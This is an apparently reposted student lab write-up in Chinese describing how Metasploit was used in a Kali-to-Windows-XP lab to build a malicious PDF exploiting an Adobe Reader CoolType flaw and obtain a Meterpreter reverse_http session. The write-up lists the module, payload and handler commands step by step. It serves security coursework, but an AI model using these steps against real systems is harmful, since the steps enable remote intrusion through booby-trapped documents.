20145322 Exp5 Adobe阅读器漏洞攻击

论坛 期权论坛 编程之家     
选择匿名的用户   2021-6-2 16:26   784   0

20145322 Exp5 Adobe阅读器漏洞攻击

实验过程

IP:kali:192.168.1.102 windowsxp :192.168.1.119

msfconsole进入控制台

使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块

设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http

使用命令show options来确定需要修改的参数。

使用命令exploit生成5333.pdf

885288-20170417112644759-1787716685.jpg

退出并重新进入msf平台,使用命令 use exploit/multi/handler进入监听模式,设置好参数,执行exploit等待被攻击者的接听。
把生成的5322.pdf移动到winxp里面,并打开

885288-20170417115215837-947498523.jpg

连接成功

885288-20170417115228446-1212170633.jpg

885288-20170417115304384-768934797.jpg

转载于:https://www.cnblogs.com/HZW20145322/p/6722223.html

分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:3875789
帖子:775174
精华:0
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP